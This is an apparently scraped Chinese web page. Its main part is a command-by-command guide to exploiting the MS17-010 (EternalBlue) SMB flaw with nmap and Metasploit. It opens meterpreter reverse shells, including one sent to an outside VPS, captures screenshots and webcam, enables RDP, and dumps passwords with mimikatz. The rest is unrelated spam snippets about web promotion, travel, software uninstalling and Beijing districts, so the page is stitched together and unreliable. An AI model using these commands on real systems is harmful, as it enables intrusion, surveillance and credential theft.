掃描是否存在ms17-010漏洞:
nmap -n -p445 --script smb-vuln-ms17-010 192.168.1.0/24 --open
MSF常規漏洞利用:
msf > use exploit/windows/smb/ms17_010_eternalblue msf > set rhost 192.168.1.112 反向打:msf > set payload windows/x64/meterpreter/reverse_tcp msf > set lhost 192.168.1.118正向打:msf > set payload windows/x64/meterpreter/bind_tcp
常用功能:
桌面抓圖 meterpreter > screenshot視頻開啟 meterpreter > webcam_scream開啟遠程桌面 meterpreter > run post/windows/manage/enable_rdp 目標密碼破解第一步:載入mimikatzmeterpreter > load mimikatz第二步:使用命令wdigest獲取密碼meterpreter >wdigest
(常規打不好使的情況下。)
1.環境 vps 140.x.x.x 目標 192.168.3.123 本地kali 192.168.3.62
2.vps開啟監聽。
use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 0.0.0.0set lport 443exploit -j -z
3.kali下開始攻擊。
use exploit/windows/smb/ms17_010_eternalblueset rhost 192.168.3.123set payload windows/x64/meterpreter/reverse_tcpset lhost 140.x.x.x #反彈到vpsset lport 443
run到下圖界面Ctrl+C
4.vps收到meterpreter。(如果不穩定就多打幾次)
方法一(命令執行)
msf5 > use auxiliary/admin/smb/ms17_010_commandmsf5 > set command whoamimsf5 > set rhosts x.x.x.x
方法二(返回meterpreter)
131363.html
本文由 貴州做網站公司 整理發布,部分圖文來源于互聯網,如有侵權,請聯系我們刪除,謝謝!
網絡推廣與網站優化公司(網絡優化與推廣專家)作為數字營銷領域的核心服務提供方,其價值在于通過技術手段與策略規劃幫助企業提升線上曝光度、用戶轉化率及品牌影響力。這...
在當今數字化時代,公司網站已成為企業展示形象、傳遞信息和開展業務的重要平臺。然而,對于許多公司來說,網站建設的價格是一個關鍵考量因素。本文將圍繞“公司網站建設價...
在當今的數字化時代,企業網站已成為企業展示形象、吸引客戶和開展業務的重要平臺。然而,對于許多中小企業來說,高昂的網站建設費用可能會成為其發展的瓶頸。幸運的是,隨...
太原到平遙古城?您好,從太原開車到平遙古城大概需要100-110公里,具體看路線和實際路況。謝謝你。平遙古城是一座具有2700多年歷史的文化名城,始建于西周宣王時期(公元前827-782年)。子明洪武三年(公元1370年)重建后,基本保持了原有格局。與第二批國家歷史文化名城四川閬中、云南麗江、安徽歙縣并稱為“保存最完好的四大古城”,也是唯一一個以古城整體成功申報世界文化遺產的古縣城。進入古城不需要...
請問我的單位電腦要卸載賽門鐵克的軟件,但是要求輸入卸載密碼。怎么辦???我試過了。許多方法非常復雜,難以使用。最簡單也是最好的卸載方法是下載cleanwipe(Symantec的官方卸載工具),然后運行它并重新啟動它。怎樣徹底刪除SEP? CleanWipe.exe在互聯網上下載。在中間重新啟動兩次。2如果你不能完全卸載賽門鐵克端點保護,1)首先在桌面空白處右擊并選擇創建一個新記事本文檔,然后將下面...
北京五道口在哪個區 五道口屬于北京哪個區?三里屯五道口是啥? 北京市海淀區五道口位于北四環路,位于八所大學的中心區域。它是中國高等院校和高級知識分子的聚居地。清華大學位于這里,教育環境優越。北京市海淀區五道口是北京語言學院、清華大學、北京大學、地質大學、石油大學、科技大學、航天大學、電影學院、聯合大學、郵電大學、中國人民銀行研究生院等十多所大學的交匯處。韓國學生和許多來中國工作的商人住在這里 ...